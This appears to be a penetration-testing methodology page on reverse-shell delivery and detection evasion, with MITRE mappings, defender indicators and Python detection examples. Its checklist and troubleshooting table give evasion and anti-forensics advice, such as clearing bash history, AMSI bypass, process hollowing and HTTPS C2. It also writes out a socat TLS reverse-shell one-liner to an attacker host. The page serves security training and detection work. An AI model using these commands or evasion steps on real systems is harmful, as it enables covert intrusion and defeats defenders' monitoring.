🛡️ Methodology Checklist
- Review MITRE ATT&CK T1059 (Command Scripting), T1105 (Ingress Tool Transfer)
- Identify shell delivery vector and apply OPSEC considerations
- Avoid writing payloads to disk when possible (in-memory execution)
- Use encrypted channels (HTTPS) to evade network detection
- Rename binaries, rename scripts to benign names
- Clean up dropped files, clear bash history (`history -c; history -w`)
- Document all payloads used for report deconfliction
🎯 Operational Context
Use when: Planning shell delivery for a target with active EDR — understand what Blue Team sees to select the least-detectable approach.
Think Dumber First: Unencrypted netcat reverse shells appear as plaintext TCP streams — any DPI device catches them. Use encrypted shells (socat TLS, MSF HTTPS) on monitored networks. Shell spawned by web process (Apache→bash) is a signature IOC — consider process injection instead.
Skip when: Lab environment with no monitoring — skip evasion overhead and use simplest working shell.
⚡ Tactical Cheatsheet
| Indicator | Detection Method | Context |
|---|---|---|
| File upload anomaly | App logs, web root file monitoring | www-data creating files in /var/www/html |
| Service account spawning shell | EDR process monitoring | iis apppool spawning cmd.exe or powershell.exe |
| User recon commands | SIEM correlation | whoami, id, ipconfig, net user in sequence |
| Heartbeat beacons | NDR / network traffic analysis | Regular repetitive connections to external IP |
| Non-standard outbound ports | Firewall logs, IDS | Traffic on 4444, 1337, 4445 — Metasploit defaults |
| Cleartext shell traffic | Wireshark / DPI | Commands visible in TCP stream (nc, telnet) |
| Bulk GET/POST | WAF / IDS | Directory brute-forcing or data exfiltration pattern |
🔬 Deep Dive & Workflow
MITRE ATT&CK Mapping
| Tactic | Technique | Tools/Methods |
|---|---|---|
| Initial Access | Public exploit, web app vuln, misconfiguration | searchsploit, default creds, web shells |
| Execution | Run malicious code on victim | MSFvenom payloads, bash one-liners, PS scripts |
| Command & Control | Maintain communication channel | Netcat listeners, Meterpreter, bind/reverse shells |
What Defenders See — Indicators of Compromise
1. File Uploads (Web Shell Detection)
- App logs: uploads to non-standard directories
- File type mismatch: `image.png` with PHP/ASPX content
- File created in web root by web service user
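Added example (not from the original cheat sheet) turning the three file-upload indicators above into a check: extension versus magic bytes, server-side script markers in the content, and a web service user writing into the web root. The account list, web root path and sample uploads are assumptions.

```python
# Magic numbers are the standard format signatures; the markers are the openers a
# server-side script needs. Users, web root and sample uploads are constructed.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}
SCRIPT_MARKERS = [b"<?php", b"<?=", b"<%", b'<script runat="server"']
WEB_SERVICE_USERS = {"www-data", "apache", "iis apppool\\defaultapppool"}   # assumed names
WEB_ROOT = "/var/www/html"                                                   # assumed path

def check_upload(filename: str, data: bytes, uploader: str, dest_dir: str) -> list:
    """Findings for one upload/file-creation event; an empty list means nothing suspicious."""
    findings = []
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    magic = MAGIC.get(ext)
    # Extension claims an image but the bytes do not start with that format's signature
    if magic is not None and not data.startswith(magic):
        findings.append(f"extension {ext} but content lacks {ext} magic bytes (file type mismatch)")
    # Script opener anywhere in the first 4 KiB, regardless of extension
    head = data[:4096].lower()
    for marker in SCRIPT_MARKERS:
        if marker.lower() in head:
            findings.append(f"server-side script marker {marker.decode()!r} in {filename}")
            break
    # The web server's own account should not be creating files under the web root
    if uploader.lower() in WEB_SERVICE_USERS and dest_dir.startswith(WEB_ROOT):
        findings.append(f"{uploader} wrote {filename} into web root {dest_dir}")
    return findings

# Constructed samples: a real PNG header from a normal user, and PHP content disguised as PNG
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
FAKE_PNG = b"<?php /* web shell body elided */ ?>"

if __name__ == "__main__":
    print(check_upload("cat.png", GOOD_PNG, "alice", "/home/alice/uploads"))
    print(check_upload("shell.png", FAKE_PNG, "www-data", WEB_ROOT))
```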
2. Process Anomalies (Endpoint Detection)
- Standard users running: `whoami`, `id`, `ipconfig`, `net user` (recon pattern)
- Service accounts (`iis apppool`, `www-data`) spawning `cmd.exe`, `powershell.exe`, `bash`
- Users accessing SMB shares outside normal behavior
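Added example, not the page's own code: the first two process-anomaly checks above run over constructed process-creation events (timestamp, user, parent image, image, command line). The account names, shell list and the "3 distinct recon commands within 120 seconds" threshold are assumptions.

```python
from collections import defaultdict

SERVICE_ACCOUNTS = {"www-data", "apache", "iis apppool\\defaultapppool", "nt authority\\network service"}
SHELLS = {"cmd.exe", "powershell.exe", "bash", "sh", "dash"}
RECON = ("whoami", "id", "ipconfig", "ifconfig", "net user", "net localgroup", "hostname")
RECON_MIN = 3        # distinct recon commands by one user ...
RECON_WINDOW = 120   # ... within this many seconds (assumed threshold)

# Constructed process-creation events: (epoch_seconds, user, parent_image, image, command_line)
EVENTS = [
    (0, "www-data", "apache2", "bash", "bash -c id"),
    (5, "alice", "cmd.exe", "whoami.exe", "whoami"),
    (10, "bob", "cmd.exe", "whoami.exe", "whoami"),
    (30, "alice", "cmd.exe", "ipconfig.exe", "ipconfig /all"),
    (60, "alice", "cmd.exe", "net.exe", "net user"),
    (400, "alice", "explorer.exe", "notepad.exe", "notepad.exe"),
]

def service_account_shells(events):
    """Service account whose process starts a shell (e.g. www-data -> bash): web shell IOC."""
    return [(ts, user, f"{parent} -> {image}") for ts, user, parent, image, _ in events
            if user.lower() in SERVICE_ACCOUNTS and image.lower() in SHELLS]

def recon_sequences(events):
    """User who runs RECON_MIN distinct recon commands inside RECON_WINDOW seconds."""
    per_user = defaultdict(list)
    for ts, user, _parent, _image, cmdline in events:
        cmd = cmdline.lower()
        for r in RECON:
            # match the whole command word, so "id" does not match "idle.exe"
            if cmd == r or cmd.startswith(r + " "):
                per_user[user].append((ts, r))
                break
    hits = []
    for user, seen in per_user.items():
        seen.sort()
        for start, _ in seen:
            window = {r for ts, r in seen if start <= ts <= start + RECON_WINDOW}
            if len(window) >= RECON_MIN:
                hits.append((user, sorted(window)))
                break
    return hits

if __name__ == "__main__":
    print(service_account_shells(EVENTS))
    print(recon_sequences(EVENTS))
```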
3. Network Traffic (C2 Detection)
- Beacons: Regular repetitive connections (heartbeat pattern) = C2 framework
- Non-standard ports: 4444 (MSF default), 4445, 1337 → immediately suspicious
- Cleartext commands: nc/telnet traffic shows exact commands in Wireshark
- Volume: Rapid sequential requests = directory brute-force or exfiltration
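Added example (not from the page) for the beacon and non-standard-port indicators: per-destination inter-arrival jitter over constructed connection records, plus the Metasploit-default ports named above. The thresholds and the sample records are assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev

SUSPICIOUS_PORTS = {4444, 4445, 1337}   # Metasploit defaults called out above
MIN_CONNECTIONS = 6                    # samples needed before judging regularity (assumed)
MAX_JITTER = 0.15                      # stdev/mean of gaps below this = heartbeat (assumed)

# Constructed connection records: (epoch_seconds, process, dst_ip, dst_port)
RECORDS = (
    [(t, "svchost.exe", "203.0.113.10", 443) for t in range(0, 480, 60)]            # every 60s
    + [(t, "firefox.exe", "192.0.2.80", 443) for t in (3, 5, 40, 41, 300, 900, 905)]  # browsing
    + [(7, "w3wp.exe", "198.51.100.5", 4444), (9, "w3wp.exe", "198.51.100.5", 4444)]
)

def analyze_connections(records):
    """Return {(dst_ip, dst_port): [reasons]} for destinations that look like C2."""
    by_dst = defaultdict(list)
    for ts, _proc, ip, port in records:
        by_dst[(ip, port)].append(ts)
    verdicts = {}
    for (ip, port), stamps in by_dst.items():
        reasons = []
        if port in SUSPICIOUS_PORTS:
            reasons.append(f"port {port} is a Metasploit default")
        stamps.sort()
        if len(stamps) >= MIN_CONNECTIONS:
            gaps = [b - a for a, b in zip(stamps, stamps[1:])]
            avg = mean(gaps)
            # a burst at one timestamp (avg 0) is not a heartbeat, so treat it as maximal jitter
            jitter = pstdev(gaps) / avg if avg > 0 else float("inf")
            if jitter < MAX_JITTER:
                reasons.append(f"{len(stamps)} connections every ~{avg:.0f}s (jitter {jitter:.2f})")
        if reasons:
            verdicts[(ip, port)] = reasons
    return verdicts

if __name__ == "__main__":
    for dst, why in analyze_connections(RECORDS).items():
        print(dst, why)
```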
Deep Packet Inspection (DPI)
Modern firewalls (Palo Alto, Check Point) inspect Layer 7:
- Can detect Meterpreter reverse TCP even on port 443
- Port 80/443 traffic that isn’t HTTP/HTTPS gets flagged
- Unencrypted nc shells show commands in plaintext — `net user hacker /add` is visible in raw packet capture
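Added example, not any vendor's DPI logic: a minimal Layer 7 check of the kind these bullets describe, classifying the first client bytes of a flow as HTTP, TLS or other, then flagging non-HTTP on 80, non-TLS on 443 and cleartext shell commands. The command regex and the sample flows are assumptions.

```python
import re

HTTP_START = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"HTTP/1.")
# Commands a plaintext nc/telnet shell carries verbatim at the start of a line (assumed list)
SHELL_CMDS = re.compile(rb"(?m)^\s*(whoami|id|net user|ipconfig|uname -a|cat /etc/passwd)\b")

def classify_payload(first_bytes: bytes) -> str:
    """Guess the application protocol from the first bytes a client sends."""
    if first_bytes.startswith(HTTP_START):
        return "http"
    # TLS record header: content type 0x16 (handshake) followed by version 0x0301..0x0304
    if len(first_bytes) >= 3 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03 and 1 <= first_bytes[2] <= 4:
        return "tls"
    return "other"

def inspect_flow(dst_port: int, first_bytes: bytes) -> list:
    """Alerts for one flow: protocol/port mismatch on 80/443 and cleartext shell commands."""
    alerts = []
    proto = classify_payload(first_bytes)
    if dst_port == 80 and proto != "http":
        alerts.append(f"port 80 carrying {proto}, not HTTP")
    if dst_port == 443 and proto != "tls":
        alerts.append(f"port 443 carrying {proto}, not TLS")
    # TLS payload is opaque; anything else is searched for command strings
    if proto != "tls" and SHELL_CMDS.search(first_bytes):
        alerts.append("cleartext shell command in TCP stream")
    return alerts

# Constructed flows: (dst_port, first client bytes)
FLOWS = [
    (443, b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03" + b"\x00" * 32),  # TLS ClientHello start
    (80, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    (443, b"whoami\nnet user hacker /add\n"),        # plain TCP shell parked on 443
    (4444, b"id\nuname -a\n"),
]

if __name__ == "__main__":
    for port, data in FLOWS:
        print(port, inspect_flow(port, data))
```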
Mitigation Strategies (Defensive Reference)
| Control | Defense | Attacker Implication |
|---|---|---|
| Application Sandboxing | Web server in container/chroot | Initial shell = limited to www-data in jail |
| Least Privilege | Services run as restricted users | Must privilege escalate after getting shell |
| DMZ Segmentation | Web servers isolated from LAN | Pivot required to reach internal network |
| Egress Filtering | Block outbound non-standard ports | Reverse shells on 4444 fail; use 80/443/53 |
| Windows Defender | Real-time protection enabled | Payloads need encoding or obfuscation |
| ScriptBlock Logging | PS command logging | PowerShell activity audited |
"Why Did My Shell Die?" Checklist
- AV killed it? → Payload deleted on disk (try fileless IEX or encode)
- Bind shell blocked? → Inbound firewall dropping the port (switch to reverse)
- Reverse shell blocked? → Egress filtering on port 4444 (use 80, 443, or 53)
- AMSI blocked PS? → Script block executed but AMSI killed it (AMSI bypass needed)
- Port conflict? → MSF handler can’t bind — check active listeners
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Shell detected immediately by EDR | Default nc/bash signatures | Encrypt: socat openssl-connect:[LHOST]:[LPORT],verify=0 exec:/bin/bash,pty,setsid,sigint |
| Process parent chain reveals injection | apache→bash is an IOC | Use process hollowing or spawn from cmd.exe to blend with normal process trees |
| Network DPI blocking reverse shell | Plain TCP detected | Use HTTPS C2 (MSF with windows/meterpreter/reverse_https); port 443 typically allowed |
| AV flags msfvenom payload on disk | Static signature | Reflective load in memory; use Donut or Cobalt Strike’s sRDI for in-memory execution |
| Shell disconnects after short time | Session timeout/keepalive | Add keepalive: MSF set SessionCommunicationTimeout 0; socat add ,keepalive |
📝 Reporting Trigger
Finding Title: Encrypted Reverse Shell Evades Network Detection
Impact: TLS-encrypted reverse shells transmitted over port 443 are indistinguishable from HTTPS traffic at the network level, bypassing DPI-based IDS/IPS and network monitoring tools.
Root Cause: Network monitoring lacks endpoint context to correlate encrypted sessions with process behavior. No EDR deployed to detect process spawn chains.
Recommendation: Deploy endpoint EDR with behavioral analytics. Implement network traffic analysis that correlates process context with connections. Monitor for unexpected TLS connections from server processes. Use process parent-child monitoring.